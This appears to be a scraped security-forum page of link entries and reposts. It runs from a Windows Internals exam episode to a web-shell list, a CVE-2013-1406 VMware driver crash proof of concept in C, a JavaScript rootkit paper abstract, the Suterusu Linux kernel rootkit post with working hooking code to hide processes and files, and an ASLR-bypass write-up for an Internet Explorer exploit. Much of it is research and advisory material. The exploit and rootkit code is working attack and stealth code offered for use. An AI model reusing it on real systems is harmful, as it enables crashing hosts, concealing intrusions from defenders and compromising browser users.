- Adobe Flash Zero-Day Attack Uses Advanced Exploitation Technique | Blog Central
- Analyzing the First ROP-Only, Sandbox-Escaping PDF Exploit | Blog Central
- Digging Into the Sandbox-Escape Technique of the Recent PDF Exploit | Blog Central
  20. [h=1]Defrag Tools: #30 - MCTS Windows Internals[/h]
By: Larry Larsen, Andrew Richards, Chad Beeder

In this episode of Defrag Tools, Andrew Richards, Chad Beeder and Larry Larsen review MCP exam 70-660 - MCTS Windows Internals.

Resources:
MCTS Windows Internals
Windows Internals Books
Kernrate
Poolmon
UMDH

Timeline:
[01:42] - Summary of the exam
[03:00] - Windows Internals books
[05:50] - Identifying Architectural Components
[14:17] - Designing Solutions
[21:34] - Monitoring Windows
[29:25] - Analyzing User Mode
[41:39] - Analyzing Kernel Mode
[45:17] - Debugging Windows
[48:32] - Good Luck!

Source: Defrag Tools: #30 - MCTS Windows Internals | Defrag Tools | Channel 9
  21. [h=1]Web Shells for All[/h]

I tweeted to ask the Twitter crowd about their favorite lazy web shells, and posted my own favorites (see the list below!):

Pentestmonkey's REVERSE php shell: php-reverse-shell | pentestmonkey
b374k-shell (PHP): https://code.google.com/p/b374k-shell/
AJAX Shell: AJAX/PHP Command Shell | Free software downloads at SourceForge.net
Weevely Shell: Weevely by epinna
The fuzzdb backdoor collection: https://code.google.com/p/fuzzdb/source/browse/#svn%2Ftrunk%2Fweb-backdoors
The laudanum set of injectable code: Laudanum / Code / [r25] (thanks @DisK0nn3cT @rubenthijssen)

Happy hacking!

Source: Web Shells for All!
  22. [h=2]VMCI.SYS IOCTL Host and Guest Privilege Elevation (CVE-2013-1406)[/h]

Cylance, Inc.
Derek Soeder
Reported: July 12, 2012
Published: February 8, 2013

[h=4]Affected Vendor[/h]
VMware, Inc.

[h=4]Affected Environments[/h]
The following VMware host product versions are known to be affected:
VMware Server 2.0.2 and earlier
VMware Workstation 7.0.0
VMware Workstation 7.1.6 and earlier
Other versions that support virtual hardware version 7 were not tested due to unavailability, but are assumed to be affected

The following VMware Tools versions are known to be affected:
VMware Tools 7.7.6 and earlier (VMware Server 2.0.2 and earlier)
VMware Tools 8.0.4 and earlier (VMware ESXi 4.0.0 Update 4 and earlier)
VMware Tools 8.1.3 (VMware Workstation 7.0.0)
VMware Tools 8.3.7 and earlier (VMware ESXi 4.1.0 Update 1 and earlier)
VMware Tools 8.3.12 prior to build-653202 (VMware ESXi 4.1.0 Update 2 prior to Build 659051 (without ESXi410-201204402-BG))
VMware Tools 8.4.9 and earlier (VMware Workstation 7.1.6 and earlier)
VMware Tools 8.6.0 (VMware ESXi 5.0.0)

Analysis: http://www.cylance.com/labs/advisories/02-08-2013-Advisory.shtml

POC:

/* This PoC is only for VMCI.SYS version 9.0.13.0 */
#include "stdafx.h"
#include "windows.h"

#define count_massive 0x189
#define ioctl_vmsock 0x8103208C
#define integer_overflow_size 0x12492492

int _tmain(int argc, _TCHAR* argv[])
{
    HANDLE vmci_device;
    DWORD bytesRet;
    int inbuf[count_massive];
    int outbuf[count_massive];
    int size_ = count_massive * sizeof(int);

    printf("**************************************************\r\n");
    printf(" [*]0x16/7ton CVE-2013-1406 simple PoC DOS exploit*\r\n");
    printf("**************************************************\r\n");

    // Open the vmci interface device
    vmci_device = CreateFileW(L"\\\\.\\vmci", GENERIC_READ,
        FILE_SHARE_WRITE | FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL);
    if (vmci_device != INVALID_HANDLE_VALUE)
    {
        printf("[+]vmci device opened \r\n");
        // Prepare the input buffer
        memset(&inbuf, 0, size_);
        // Parameter vulnerable to integer overflow
        inbuf[4] = integer_overflow_size;
        printf("[+]After delaying we send IOCTL, prepare for BSOD \r\n");
        // Delaying, signed with Diablo stamp
        Sleep(0x29a);
        Sleep(0x1000);
        DeviceIoControl(vmci_device, ioctl_vmsock, &inbuf, size_,
            &outbuf, size_, &bytesRet, NULL);
        CloseHandle(vmci_device);
    }
    else
    {
        printf("[-]Error: Can't open vmci device!\r\n");
    }
    return 0;
}

Source: [C] CVE-2013-1406 PoC DOS exploit - Pastebin.com
  23. Rootkits for JavaScript Environments

Ben Adida, Harvard University
Adam Barth, UC Berkeley, abarth@eecs.berkeley.edu
Collin Jackson, Stanford University, collinj@cs.stanford.edu

Abstract

A number of commercial cloud-based password managers use bookmarklets to automatically populate and submit login forms. Unfortunately, an attacker web site can maliciously alter the JavaScript environment and, when the login bookmarklet is invoked, steal the user's passwords. We describe general attack techniques for altering a bookmarklet's JavaScript environment and apply them to extracting passwords from six commercial password managers. Our proposed solution has been adopted by several of the commercial vendors.

Download: http://static.usenix.org/event/woot09/tech/full_papers/adida.pdf
  24. Suterusu Rootkit: Inline Kernel Function Hooking on x86 and ARM

Table of Contents
- Introduction
- Function Hooking in Suterusu
  - Function Hooking on x86
  - Write Protection
- Function Hooking on ARM
  - Instruction Caching
- Pros and Cons of Inline Hooking
- Hiding Processes, Files, and Directories

Introduction

A number of months ago, I added a new project to the redmine tracker showcasing some code I worked on over the summer (Suterusu - Overview - Redmine). Through my various router persistence and kernel exploitation adventures, I've taken a recent interest in Linux kernel rootkits and what makes them tick. I did some searching around, mainly in the packetstorm.org archive and whatever blogs turned up, but to my surprise there really wasn't much to be found in the realm of modern public Linux rootkits. The most prominent results centered around adore-ng, which hasn't been updated since 2007 (at least, from the looks of it), and a few miscellaneous names like suckit, kbeast, and Phalanx. A lot changes in the kernel from year to year, and I was hoping for something a little more recent. So, like most of my projects, I said "screw it" and opened vim. I'll write my own rootkit designed to work on modern systems and architectures, and I'll learn how they work through the act of doing it myself.

I'd like to (formally) introduce you to Suterusu, my personal kernel rootkit project targeting Linux 2.6 and 3.x on x86 and ARM. There's a lot to talk about in the way of techniques, design, and implementation, but I'll start out with some of the basics. Suterusu currently sports a large array of features, with many more in staging, but it may be more appropriate to devote separate blog posts to these.

Function Hooking in Suterusu

Most rootkits traditionally perform system call hooking by swapping out function pointers in the system call table, but this technique is well known and trivially detectable by intelligent rootkit detectors.
Instead of pursuing this route, Suterusu utilizes a different technique and performs hooking by modifying the prologue of the target function to transfer execution to the replacement routine. This can be observed by examining the following four functions:

hijack_start()
hijack_pause()
hijack_resume()
hijack_stop()

These functions track hooks through a linked list of sym_hook structs, defined as:

struct sym_hook {
    void *addr;
    unsigned char o_code[HIJACK_SIZE];
    unsigned char n_code[HIJACK_SIZE];
    struct list_head list;
};

LIST_HEAD(hooked_syms);

To fully understand the hooking process, let's step through some code.

Function Hooking on x86

Most of the weight is carried by the hijack_start() function, which takes as arguments pointers to the target routine and the "hook-with" routine:

void hijack_start ( void *target, void *new )
{
    struct sym_hook *sa;
    unsigned char o_code[HIJACK_SIZE], n_code[HIJACK_SIZE];
    unsigned long o_cr0;

    // push $addr; ret
    memcpy(n_code, "\x68\x00\x00\x00\x00\xc3", HIJACK_SIZE);
    *(unsigned long *)&n_code[1] = (unsigned long)new;

    memcpy(o_code, target, HIJACK_SIZE);

    o_cr0 = disable_wp();
    memcpy(target, n_code, HIJACK_SIZE);
    restore_wp(o_cr0);

    sa = kmalloc(sizeof(*sa), GFP_KERNEL);
    if ( ! sa )
        return;

    sa->addr = target;
    memcpy(sa->o_code, o_code, HIJACK_SIZE);
    memcpy(sa->n_code, n_code, HIJACK_SIZE);

    list_add(&sa->list, &hooked_syms);
}

A small-sized shellcode buffer is initialized with a "push dword 0; ret" sequence, of which the pushed value is patched with the pointer of the hook-with function. HIJACK_SIZE bytes (the size of the shellcode) are copied from the target function, and the prologue is then overwritten with the patched shellcode. At this point, all calls to the target function will redirect to our hook-with function. The final step is to store the target function pointer, original code, and hook code in the linked list of hooks, thus completing the operation.
The remaining hijack functions operate on this linked list. hijack_pause() uninstalls the desired hook temporarily:

void hijack_pause ( void *target )
{
    struct sym_hook *sa;

    list_for_each_entry ( sa, &hooked_syms, list )
        if ( target == sa->addr )
        {
            unsigned long o_cr0 = disable_wp();
            memcpy(target, sa->o_code, HIJACK_SIZE);
            restore_wp(o_cr0);
        }
}

hijack_resume() reinstalls the hook:

void hijack_resume ( void *target )
{
    struct sym_hook *sa;

    list_for_each_entry ( sa, &hooked_syms, list )
        if ( target == sa->addr )
        {
            unsigned long o_cr0 = disable_wp();
            memcpy(target, sa->n_code, HIJACK_SIZE);
            restore_wp(o_cr0);
        }
}

hijack_stop() uninstalls the hook and deletes it from the linked list:

void hijack_stop ( void *target )
{
    struct sym_hook *sa;

    list_for_each_entry ( sa, &hooked_syms, list )
        if ( target == sa->addr )
        {
            unsigned long o_cr0 = disable_wp();
            memcpy(target, sa->o_code, HIJACK_SIZE);
            restore_wp(o_cr0);

            list_del(&sa->list);
            kfree(sa);
            break;
        }
}

Write Protection on x86

Since kernel text pages are marked read-only, attempting to overwrite a function prologue in this region of memory will produce a kernel oops. This protection may be trivially circumvented, however, by setting the WP bit of the cr0 register to 0, disabling write protection on the CPU. Wikipedia's article on control registers confirms this property:

[TABLE]
[TR][TH]BIT[/TH][TH]NAME[/TH][TH]FULL NAME[/TH][TH]DESCRIPTION[/TH][/TR]
[TR][TD]16[/TD][TD]WP[/TD][TD]Write protect[/TD][TD]Determines whether the CPU can write to pages marked read-only[/TD][/TR]
[/TABLE]

The WP bit will need to be set and reset at multiple points in the code, so it makes programmatic sense to abstract the operations. The following code originates from the PaX project, specifically from the native_pax_open_kernel() and native_pax_close_kernel() routines.
Extra caution is taken to prevent a potential race condition caused by unlucky scheduling on SMP systems, as explained in a blog post by Dan Rosenberg:

inline unsigned long disable_wp ( void )
{
    unsigned long cr0;

    preempt_disable();
    barrier();

    cr0 = read_cr0();
    write_cr0(cr0 & ~X86_CR0_WP);
    return cr0;
}

inline void restore_wp ( unsigned long cr0 )
{
    write_cr0(cr0);

    barrier();
    preempt_enable_no_resched();
}

Function Hooking on ARM

A number of significant changes exist in the hijack_* set of hooking routines depending on whether the code is compiled for x86 or ARM. For instance, the concept of a WP bit does not exist on ARM, while special care must be taken to handle the data and instruction caching introduced by the architecture. While data and instruction caching also exist on the x86 and x86_64 architectures, those features did not pose an obstacle during development. Below is a version of hijack_start() modified to address these architectural characteristics, specific to ARM:

void hijack_start ( void *target, void *new )
{
    struct sym_hook *sa;
    unsigned char o_code[HIJACK_SIZE], n_code[HIJACK_SIZE];

    if ( (unsigned long)target % 4 == 0 )
    {
        // ldr pc, [pc, #0]; .long addr; .long addr
        memcpy(n_code, "\x00\xf0\x9f\xe5\x00\x00\x00\x00\x00\x00\x00\x00", HIJACK_SIZE);
        *(unsigned long *)&n_code[4] = (unsigned long)new;
        *(unsigned long *)&n_code[8] = (unsigned long)new;
    }
    else // Thumb
    {
        // add r0, pc, #4; ldr r0, [r0, #0]; mov pc, r0; mov pc, r0; .long addr
        memcpy(n_code, "\x01\xa0\x00\x68\x87\x46\x87\x46\x00\x00\x00\x00", HIJACK_SIZE);
        *(unsigned long *)&n_code[8] = (unsigned long)new;
        target--;
    }

    memcpy(o_code, target, HIJACK_SIZE);

    memcpy(target, n_code, HIJACK_SIZE);
    cacheflush(target, HIJACK_SIZE);

    sa = kmalloc(sizeof(*sa), GFP_KERNEL);
    if ( ! sa )
        return;

    sa->addr = target;
    memcpy(sa->o_code, o_code, HIJACK_SIZE);
    memcpy(sa->n_code, n_code, HIJACK_SIZE);

    list_add(&sa->list, &hooked_syms);
}

As displayed above, shellcodes for ARM and Thumb are included to redirect execution, similar to those on x86/_64.

Instruction Caching on ARM

Most Android devices do not enforce read-only kernel page permissions, so at least for now we can forego any potential voodoo magic to write to protected memory regions. It is still necessary, however, to consider instruction caching on ARM when performing a function hook. ARM CPUs utilize a data cache and an instruction cache for performance benefits. However, modifying code in-place may cause the instruction cache to become incoherent with the actual instructions in memory. According to the official ARM technical reference, this issue becomes readily apparent when developing self-modifying code. The solution is simply to flush the instruction cache whenever a modification to kernel text is made, which is accomplished by a call to the kernel routine flush_icache_range():

void cacheflush ( void *begin, unsigned long size )
{
    flush_icache_range((unsigned long)begin, (unsigned long)begin + size);
}

Pros and Cons of Inline Hooking

As with most techniques, inline function hooking presents various benefits and detriments when compared to simply hijacking the system call table:

Pro: Any function may be hijacked, not just system calls.

Pro: Less commonly implemented in rootkits, so it is less likely to be detected by rootkit detectors. It is also easy to circumvent simple hook detection engines due to the flexibility of assembly languages. A variety of detection evasion techniques for x86 may be found in the article x86 API Hooking Demystified.

Pro: Inline function hooking may be applied to userland with minimal or no modification.
While working on the Android port of DMTCP, an application checkpointing tool out of Northeastern's HPC lab, it was possible to simply copy and paste the entirety of the hijack_* routines, modified only to use userland linked lists.

Con: The current hooking implementation is not thread-safe. By temporarily unhooking a function via hijack_pause(), a race window is opened for other threads to execute the unhooked function before hijack_resume() is called. Potential solutions include crafty use of locking, or permanently hijacking the target function and inserting extra logic within the hook-with routine. With the latter option, however, special care must be taken when executing the original function prologue on architectures characterized by variable-length instructions (x86/_64) and PC/IP-relative addressing (x86_64 and ARM).

Con: Another harmful possibility in the current implementation is hook recursion. More an issue of poor implementation than any insurmountable design flaw, there are various easy solutions to the problem of having your hook-with function accidentally call the hooked function itself, leading to infinite recursion. Great information on the topic and proof-of-concept code can (once again) be found in the article x86 API Hooking Demystified.

Hiding Processes, Files, and Directories

Once a reliable hooking "framework" is implemented, it's fairly trivial to start intercepting interesting functions and doing interesting things. One of the most basic things a rootkit must do is hide processes and filesystem objects, both of which may be accomplished with the same basic technique. In the Linux kernel, one or more instances of the file_operations struct are associated with each supported filesystem (usually one instance for files and one for directories, but dig into the kernel source code and you'll find that filesystems are a certain kind of special).
These structs contain pointers to the routines associated with different file operations, for instance reading, writing, mmap'ing, modifying permissions, etc. For explanatory purposes, we will examine the instantiation of the file_operations struct for directory objects on ext3:

const struct file_operations ext3_dir_operations = {
    .llseek         = generic_file_llseek,
    .read           = generic_read_dir,
    .readdir        = ext3_readdir,
    .unlocked_ioctl = ext3_ioctl,
#ifdef CONFIG_COMPAT
    .compat_ioctl   = ext3_compat_ioctl,
#endif
    .fsync          = ext3_sync_file,
    .release        = ext3_release_dir,
};

To hide an object on the filesystem, it is possible to simply hook the readdir function and filter out any undesired items from its output. To maintain a level of system agnosticism, Suterusu dynamically obtains the pointer to a filesystem's active readdir routine by navigating the target object's file struct:

void *get_vfs_readdir ( const char *path )
{
    void *ret;
    struct file *filep;

    if ( (filep = filp_open(path, O_RDONLY, 0)) == NULL )
        return NULL;

    ret = filep->f_op->readdir;
    filp_close(filep, 0);

    return ret;
}

The actual hook process (for hiding items in /proc) looks like:

#if LINUX_VERSION_CODE > KERNEL_VERSION(2, 6, 30)
proc_readdir = get_vfs_readdir("/proc");
#endif
hijack_start(proc_readdir, &n_proc_readdir);

The kernel version check is in response to a change implemented in version 2.6.31 that removed the exported proc_readdir() symbol from include/linux/proc_fs.h. In previous versions it was possible to simply retrieve the pointer value externally upon linking, but rootkit developers are now forced to obtain it by alternate, manual means.
To perform the actual hiding of objects in /proc, Suterusu hooks proc_readdir() with the following routine:

static int (*o_proc_filldir)(void *__buf, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type);

int n_proc_readdir ( struct file *file, void *dirent, filldir_t filldir )
{
    int ret;

    o_proc_filldir = filldir;

    hijack_pause(proc_readdir);
    ret = proc_readdir(file, dirent, &n_proc_filldir);
    hijack_resume(proc_readdir);

    return ret;
}

The real heavy lifting occurs in the filldir function, which serves as a callback executed for each item in the directory. This is replaced with a malicious n_proc_filldir() function, as follows:

static int n_proc_filldir( void *__buf, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type )
{
    struct hidden_proc *hp;
    char *endp;
    long pid;

    pid = simple_strtol(name, &endp, 10);

    list_for_each_entry ( hp, &hidden_procs, list )
        if ( pid == hp->pid )
            return 0;

    return o_proc_filldir(__buf, name, namelen, offset, ino, d_type);
}

Since the intention is to hide processes by hijacking the readdir/filldir routines of /proc, Suterusu simply matches the object name against a linked list of all PIDs the user wishes to hide. If a match is found, the callback returns 0 and the item is hidden from the directory listing. Otherwise, the original proc_filldir() function is executed and its value returned. The same concept applies to hiding files and directories, except that a direct string match against the object name is performed instead of first converting the name to a number type:

static int n_root_filldir( void *__buf, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type )
{
    struct hidden_file *hf;

    list_for_each_entry ( hf, &hidden_files, list )
        if ( ! strcmp(name, hf->name) )
            return 0;

    return o_root_filldir(__buf, name, namelen, offset, ino, d_type);
}

Source: Suterusu Rootkit: Inline Kernel Function Hooking on x86 and ARM | Michael Coppola's Blog
  25. Attacking the Windows 7/8 Address Space Randomization

================================================================================
Attacking the Windows 7/8 Address Space Randomization
Copyright © 2013 Kingcope

"Was nicht passt wird passend gemacht"
(English: "If it don't fit, use a bigger hammer.")
German phrase
================================================================================

Synopsis - What this text is all about
================================================================================
The following text is what looks like an attempt to circumvent Windows 7 and Windows 8 memory protections in order to execute arbitrary assembly code. The presented methods are particularly useful for client-side attacks, as used for example in browser exploits. The topic discussed here is a very complex one. At the time I started the research I thought the idea behind the attack would be applied to real-world scenarios quickly and easily. I had to be convinced of the opposite. The research was done without knowing much about the real internals of the Windows memory space protection, but rather using brute force and trial & error in order to achieve what is presented in the upcoming text. Be warned - the methods to attack the protection mechanisms presented here are not failsafe and can be improved. Though in many cases it is possible to completely bypass Windows 7 and especially Windows 8 ASLR by using these techniques.

Target Software
================================================================================
The operating systems used are Windows 7 and Windows 8. The included PoC code runs on 32-bit platforms and exploits Internet Explorer 8. All of it can be applied to Internet Explorer 9 with modifications to the PoC code. For Internet Explorer 10 the memory protection bypass is included and demonstrated in the PoC; executing code through return oriented programming is left as an exercise to the reader.
The PoC makes use of the following vulnerability, and therefore the patch must not be installed when testing the PoC:

MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability

This vulnerability is identified as CVE-2012-4969. It might be possible to use the very same method to exploit other browsers, as other browsers give similar opportunities to the exploit writer. I don't want to sound crazy, but even other operating systems might be affected by this, yet unconfirmed.

Current ways to exploit browsers
================================================================================
Today a lot of attention is brought to client-side exploits, especially inside web browsers. Normally the exploitation is done through the old known method of spraying the heap. This is done by populating the heap with nopsleds and actual shellcode. By filling the heap in this way, a heap overrun can be used to rewrite the instruction pointer of the processor to a known heap address where the shellcode resides, quite deterministically. In order to bypass protections like Data Execution Prevention, a ROP chain is built. There are exploits that install a stack pivot in the first place in order to exploit a heap overrun as if it were a stack-based buffer overrun, using a "return into code" technique. The mentioned modern ways to exploit heap corruptions are documented very well.

When it comes to Windows 7 and Windows 8 exploitation, the exploit writer will face the obstacle of randomized memory space. There remains the simple question: where do I jump to when having control over the instruction pointer? It might be possible to leak memory directly from the web browser and use this information to gain knowledge of the correct offsets and executable code sections. This requires knowledge of a memory leak bug, though, and therefore is not used a lot.
Another option is to use old DLLs that do not have their image bases randomized; for example, older Java versions are known to have unrandomized image bases. This option requires the use of third-party software that has to be installed. This text will present a new way to deal with the 'where do I jump when I have code execution' problem.

Introduction to Windows memory randomization
================================================================================
Windows 7 and Windows 8 have a special security-relevant protection programmed in: the so-called A.S.L.R or '[A]ddress [S]pace [L]ayout [R]andomization', which does nothing more than randomize every piece of memory, say its offsets. For example, the program image is randomized, and the DLLs the program uses are randomized too. There is not a single piece of memory of which one could say that after a reboot the data will be at the same place as before the reboot. The addresses even change when a program is restarted.

ActiveX and other useful features
================================================================================
Web browser exploits have many advantages over other kinds of exploits. For example, JavaScript code can be executed inside the web browser. This is also the tool that heap spraying makes use of. Let us have a look at what happens if we load an ActiveX object dynamically when a web page loads. The ActiveX object we will load is the Windows Media Player control. This can be done either using JavaScript or plain HTML code. At the point the ActiveX object is loaded, Windows will internally load the DLLs into the memory space if they were not previously inside the program's memory space. The offset at which the DLLs are loaded in memory space is completely random. At least it should be. Let us now see how we can manage to put a DLL into memory space at a fixed address by loading an ActiveX object at runtime.
Exhausting memory space and squeezing DLLs into memory
================================================================================
The nuts and bolts of what is presented here is the idea that DLLs are loaded into memory space if there is memory available, and if there is no memory or only small amounts of memory available, then the DLL will be put into the remaining memory hole. This sounds simple. And it works: we can load a DLL into a remaining memory hole.

First of all, the exploit writer has to code a JavaScript routine that fills memory until the memory boundary is hit and a JavaScript exception is raised. When the memory is filled up, the installed JavaScript exception handler will execute JavaScript code that frees small chunks of memory in several steps; in each step the JavaScript code will try to load an ActiveX object. The result is that the DLL (sometimes several DLLs are loaded for an ActiveX object) will be loaded at a predictable address. This means that the exploit writer now has a predictable address to jump to, and the 'where do I jump when I have code execution' problem is solved. One problem with the method is that Windows will become unresponsive at the time memory is exhausted, but it will resume normal operation after the DLL is loaded at a fixed address and the memory is freed using the JavaScript code.

Summary of exploitation stages:

* Fill the heap with random bytes until all memory is used up. During the heap filling stage Windows might become unresponsive, and will relax soon afterwards.
* Free small heap blocks one by one and try adding a DLL (for example by using a new ActiveX object that is loadable without a warning by Internet Explorer). This DLL (and the DLLs that are loaded from it) will be squeezed into the remaining memory region (the space that was freed by us through JavaScript).
  This address is fixed and predictable for us to jump to.
* Free the remaining memory blocks which were allocated before.
* Spray the heap using the well-known method.
* Finally, trigger the heap corruption and jump to this fixed DLL base to execute our code in a ROP manner.

To say it abstractly, the exploit writer has to be especially careful about the timing in the JavaScript code and about the memory the exploit routines themselves take up.

ROP chain and the LoadLibrary API
================================================================================
Once we have loaded the DLL at a predictable address, it is possible to use a ROP chain in order to execute shellcode. The PoC code goes a much simpler path. It uses a short ROP chain and calls the LoadLibrary API contained in the Windows Media Player DLLs. This way another DLL can be fetched from a WebDAV share and loaded into the Internet Explorer memory space in order to fully execute arbitrary code.

Windows 8 singularity
================================================================================
Test cases have shown that Windows 8 behaves more vulnerably to the method than Windows 7. On Windows 8 the DLL will be loaded at the very low address 0x10000, and more reliably than on Windows 7. Windows 7 is much more persistent in loading the DLL at a fixed memory address. The test cases for Windows 7 have shown that the DLL will be loaded at the predictable address at least 7 out of 10 times of loading the exploit.

The PoC codes
================================================================================
There are two different PoCs, one for Windows 7 and one for Windows 8. The Windows 8 code is a slightly modified version of the Windows 7 code. Please note that Windows Defender detects the Win8 PoC as being an exploit and blocks execution. The parts which are detectable by Windows Defender are not needed for the A.S.L.R. attack to work.
Please disable Windows Defender if you test the Windows 8 PoC for now. The Windows 7 PoC is successful if it loads gdiplus.dll at the predictable fixed offset 0x7F7F0000. If you are lucky and have set up the exploit appropriately, the payload will be executed, which is currently a MessageBox that pops up. The Windows 8 PoC is successful if it loads gdiplus.dll at the predictable fixed offset 0x10000.

Please note that wmp.dll (the Windows Media Player DLL) and gdiplus.dll should not be in the Internet Explorer address space prior to executing the PoC for it to succeed. As a final note, the PoC does not depend on the ActiveX control that is added; it can be changed with some effort to load a different DLL.

Here are the mappings I observed when the PoC succeeds:

Windows 7 32-Bit Service Pack 0 & Service Pack 1, across reboots:

Address   Size      Owner    Section  Contains      Type  Access
7F7F0000  00001000  gdiplus           PE header     Imag  R RWE
7F7F1000  0016B000  gdiplus  .text    code,imports  Imag  R RWE
7F95C000  00008000  gdiplus  .data    data          Imag  R RWE
7F964000  00001000  gdiplus           Shared        Imag  R RWE
7F965000  00012000  gdiplus  .rsrc    resources     Imag  R RWE
7F977000  00009000  gdiplus  .reloc   relocations   Imag  R RWE

Windows 8 32-Bit, across reboots:

Address   Size      Owner    Section  Contains      Type  Access
00010000  00001000  gdiplus           PE header     Imag  R RWE
00011000  00142000  gdiplus  .text    code,exports  Imag  R RWE
00153000  00002000  gdiplus  .data                  Imag  R RWE
00155000  00003000  gdiplus  .idata   imports       Imag  R RWE
00158000  00012000  gdiplus  .rsrc    resources     Imag  R RWE
0016A000  00009000  gdiplus  .reloc   relocations   Imag  R RWE

The archive containing the PoCs is found here: http://www.farlight.org/rlsa.zip

Enjoy!

Source: http://kingcope.wordpress.com/